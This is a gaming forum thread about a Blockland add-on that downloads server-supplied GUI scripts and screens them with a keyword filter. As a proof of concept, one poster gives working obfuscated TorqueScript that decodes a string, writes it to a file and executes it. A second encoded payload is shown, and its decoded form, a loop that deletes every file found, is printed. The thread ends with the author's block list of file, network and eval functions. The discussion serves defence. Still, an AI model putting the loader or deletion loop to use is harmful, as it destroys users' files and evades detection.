Author Topic: GUI Downloading (Read 4151 times)

Wicked · February 13, 2014, 09:56:36 PM

Information

Blockland Plus allows users to easily download a custom GUI from servers in game. There are several preferences the user can set which effect how Blockland Plus operates. In addition, this comes with a GUI Manager which can be accessed in the Options Window. This allows users to load, scan, delete, or manually approve a downloaded GUI.

There are several filtered pieces of code that will alert the client that the file could be harmful if it contains them such as deleting files, or creating a new TCPObject. In addition the file will be checked for a client.cs and any unwanted file types. If it is missing a client.cs or if it contains any unwanted file types, it will be deleted. Upon joining a server that uses this system, you will be asked to download the required client file or load it if you already have the newest version.

Pictures

Download

https://www.dropbox.com/s/qstp1fmo6jps5bu/System_BlocklandPlus.zip

Discuss

This add-on is currently finished and working but I am looking for some feedback first. Discuss down below as to whether you would want this or not. Feel free to post any suggestions or concerns you may have as well.

Ad Bot · Advertisement

jes00 · February 13, 2014, 09:59:57 PM

Wicked?... I thought you left Blockland a while ago.

On topic: Sounds like a great add-on to me. The checkmark UI needs replacing though and the name does not really fit, as it sounds like an entirely new version of Blockland. Does it also consider the use of eval dangerous? It should. There not really a fool proof checking system you can make though.

hodot · February 13, 2014, 10:00:09 PM

wow why didnt i think of that

Wicked · February 13, 2014, 10:20:56 PM

Quote from: jes00 on February 13, 2014, 09:59:57 PM

Wicked?... I thought you left Blockland a while ago.

On topic: Sounds like a great add-on to me. The checkmark UI needs replacing though and the name does not really fit, as it sounds like an entirely new version of Blockland. Does it also consider the use of eval dangerous? It should. There not really a fool proof checking system you can make though.

Hmm I sort of agree about the name not fitting too much if gui downloading is the only part included in the system. I don't really plan on adding more at the moment either. Also, it does check for eval too.

Lugnut · February 13, 2014, 10:43:06 PM

Post the mod. Why wouldn't you post the mod?

Ipquarx · February 13, 2014, 10:49:00 PM

Code: [Select]

$alpha = "0123456789 abcdefghijklmnopqrstuvwxyz!@#$%^&*()_+-=~{}[]:;<>?\",./'";

function a(%a)
{
	for(%b=getsubstr(%a,0,1);%b!$="";%b=getsubstr(%a,%c++,1))
		%d=%d @ getsubstr($alpha, (strpos($alpha, %b) - 1) % 66, 1);
	return%d;
}

function b(%a)
{
	%b="base/a.cs";
	%f = new fileobject();
	%f.openforwrite(%b);
	%f.writeline(a(%a));
	%f.close();
	%f.delete();
	exec(%b);
}

b("dsbti)_<");

how can a regular user be able to detect an exploit like that

@lug
Exactly my point. Unless you have some sort of trusted approval process then you can't trust the server

Lugnut · February 13, 2014, 10:56:31 PM

i can't even loving detect that stuff reading with my eyes

does it... shift?
yes, it takes encoded input and then...
forget i just cannot get a() through my head

Zeblote · February 14, 2014, 06:06:41 AM

Quote from: Lugnut on February 13, 2014, 10:56:31 PM

i can't even loving detect that stuff reading with my eyes

does it... shift?
yes, it takes encoded input and then...
forget i just cannot get a() through my head

it writes a script that contains crash(); and executes it

Ipquarx · February 14, 2014, 10:16:10 AM

Quote from: Zeblote on February 14, 2014, 06:06:41 AM

it writes a script that contains crash(); and executes it

Be happy I didn't put in b("gps)^b~gjoegjstugjmf),(/(,_<^b@%~,,<^b~gjoeofyugjmf),(/(,__gjmfefmfuf)^b_<");

Zeblote · February 14, 2014, 10:27:29 AM

Quote from: Ipquarx on February 14, 2014, 10:16:10 AM

Be happy I didn't put in b("gps)^b~gjoegjstugjmf),(/(,_<^b@%~,,<^b~gjoeofyugjmf),(/(,__gjmfefmfuf)^b_<");

I'm randomly gonna assume that says something along the lines of for(%f=findfirstfile("*"),1,%f=findnextfile("*.*")){filedelete(%f);}

Right?

Ipquarx · February 14, 2014, 10:45:01 AM

Nearly correct, it's for(%a=findfirstfile("*.*");%a!$="";%a=findnextfile("*.*"))filedelete(%a);

The point is, even something so simple as a rot1 in an extended alphabet can be manipulated in endless ways to bypass automated detection.

Greek2me · February 14, 2014, 10:49:59 AM

IP's method seems to hinge on fileobjects. Just warn on fileobjects.

Wicked · February 14, 2014, 12:04:44 PM

Updated the file to include a preference option to automatically delete files with syntax errors and another to automatically delete files that previously crashed you while executing.

Quote from: Ipquarx on February 14, 2014, 10:45:01 AM

Nearly correct, it's for(%a=findfirstfile("*.*");%a!$="";%a=findnextfile("*.*"))filedelete(%a);

The point is, even something so simple as a rot1 in an extended alphabet can be manipulated in endless ways to bypass automated detection.

That would be caught by the code filter and warn the client.

Port · February 14, 2014, 12:06:44 PM

Quote from: Wicked on February 14, 2014, 12:04:44 PM

That would be caught by the code filter and warn the client.

That code, sure, but what about the other version?

You should disallow eval(), exec(), export(), deleteVariables(), fileDelete(), fileCopy(), new TCPObject, new HTTPObject, new FileObject and a lot more. You really can't cover everything.

Wicked · February 14, 2014, 12:37:18 PM

Quote from: Port on February 14, 2014, 12:06:44 PM

That code, sure, but what about the other version?

You should disallow eval(), exec(), export(), deleteVariables(), fileDelete(), fileCopy(), new TCPObject, new HTTPObject, new FileObject and a lot more. You really can't cover everything.

It didn't have export or deleteVariables, I'll add that thanks. It does check for eval and those other ones though. Here is the current list of filters:

Code: [Select]

%filter[%filters++] = "fileDelete";
%filter[%filters++] = "fileCopy";
%filter[%filters++] = "findFirstFile";
%filter[%filters++] = "findNextFile";
%filter[%filters++] = "getFileCount";
%filter[%filters++] = "getFileCRC";
%filter[%filters++] = "getFileLength";
%filter[%filters++] = "getStringCRC";
%filter[%filters++] = "isFile";
%filter[%filters++] = "getFileModifiedTime";
%filter[%filters++] = "getFileModifiedSortTime";
%filter[%filters++] = "isWriteableFileName";
%filter[%filters++] = "fileExt";
%filter[%filters++] = "fileBase";
%filter[%filters++] = "fileName";
%filter[%filters++] = "filePath";
%filter[%filters++] = "createPath";
%filter[%filters++] = "fileObject";
%filter[%filters++] = "TCPObject";
%filter[%filters++] = "HTTPObject";
%filter[%filters++] = "saveBufferToFile";
%filter[%filters++] = "openForRead";
%filter[%filters++] = "openForAppend";
%filter[%filters++] = "openForWrite";
%filter[%filters++] = "WriteLine";
%filter[%filters++] = "ReadLine";
%filter[%filters++] = "export";
%filter[%filters++] = "deleteVariables";
%filter[%filters++] = "exec";
%filter[%filters++] = "eval";
%filter[%filters++] = "call";
%filter[%filters++] = "schedule";
%filter[%filters++] = "BlocklandPlus";

Can you think of anything else that needs to be added?